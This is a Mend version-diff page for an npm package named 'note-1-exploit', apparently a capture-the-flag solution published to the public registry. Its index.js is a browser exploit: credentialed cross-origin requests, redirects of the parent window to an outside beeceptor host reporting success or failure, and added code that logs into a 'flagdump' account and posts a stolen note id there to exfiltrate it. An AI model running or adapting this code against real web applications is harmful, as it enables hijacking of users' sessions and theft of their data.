npm - note-1-exploit - Versions diffs - 1.0.24 → 1.0.25 - Mend

note-1-exploit 1.0.24 → 1.0.25

Files changed (2) hide show

package/index.js +36 -54
package/package.json +1 -1

package/index.js CHANGED Viewed

@@ -12,59 +12,41 @@ async function exploit() {
         "mode": "cors",
         "credentials": "include"
     }).then(res => {
-        window.parent.location.replace("https://omniman.free.beeceptor.com?q=success");
+        res.json();
     })
-        .catch((error) => window.parent.location.replace("https://omniman.free.beeceptor.com?q=fail" + error.toString()));
-    // window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahahaha")
-    // let json_results = await all_results.json();
-    // let note_name = (Math.random() + 1).toString(36).substring(7);
-    // await fetch("http://127.0.0.1:10082/login", {
-    //     "headers": {
-    //         "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
-    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-    //         "cache-control": "max-age=0",
-    //         "content-type": "application/x-www-form-urlencoded",
-    //         "sec-gpc": "1",
-    //         "upgrade-insecure-requests": "1"
-    //     },
-    //     "referrer": "http://127.0.0.1:10082/login",
-    //     "referrerPolicy": "strict-origin-when-cross-origin",
-    //     "body": "username=nnnddd&password=nnnddd",
-    //     "method": "POST",
-    //     "mode": "cors",
-    //     "redirect": "follow",
-    //     "credentials": "include"
-    // });
-    // await fetch("http://127.0.0.1:10082/login", {
-    //     "headers": {
-    //         "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
-    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-    //         "cache-control": "max-age=0",
-    //         "content-type": "application/x-www-form-urlencoded",
-    //         "sec-gpc": "1",
-    //         "upgrade-insecure-requests": "1"
-    //     },
-    //     "referrer": "http://127.0.0.1:10082/login",
-    //     "referrerPolicy": "strict-origin-when-cross-origin",
-    //     "body": "username=nnnddd&password=nnnddd",
-    //     "method": "POST",
-    //     "mode": "cors",
-    //     "redirect": "follow",
-    //     "credentials": "include"
-    // });
-    // await fetch("http://127.0.0.1:10082/api/notes", {
-    //     "headers": {
-    //         "accept": "*/*",
-    //         "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-    //         "content-type": "application/json",
-    //         "sec-gpc": "1"
-    //     },
-    //     "referrer": "http://127.0.0.1:10082/",
-    //     "referrerPolicy": "strict-origin-when-cross-origin",
-    //     "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
-    //     "method": "POST",
-    //     "mode": "cors",
-    //     "redirect": "follow",
-    //     "credentials": "include"
-    // });
+    window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahahaha")
+    let json_results = await all_results.json();
+    let note_name = (Math.random() + 1).toString(36).substring(7);
+    await fetch("/login", {
+        "headers": {
+            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
+            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+            "cache-control": "max-age=0",
+            "content-type": "application/x-www-form-urlencoded",
+            "sec-gpc": "1",
+            "upgrade-insecure-requests": "1"
+        },
+        "referrer": "http://web/login",
+        "referrerPolicy": "strict-origin-when-cross-origin",
+        "body": "username=flagdump&password=flagdump",
+        "method": "POST",
+        "mode": "cors",
+        "redirect": "follow",
+        "credentials": "include"
+    });
+    await fetch("/api/notes", {
+        "headers": {
+            "accept": "*/*",
+            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
+            "content-type": "application/json",
+            "sec-gpc": "1"
+        },
+        "referrer": "http://web/",
+        "referrerPolicy": "strict-origin-when-cross-origin",
+        "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
+        "method": "POST",
+        "mode": "cors",
+        "redirect": "follow",
+        "credentials": "include"
+    });
 };

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "note-1-exploit",
-  "version": "1.0.24",
+  "version": "1.0.25",
   "description": "give me the flag",
   "main": "index.js",
   "scripts": {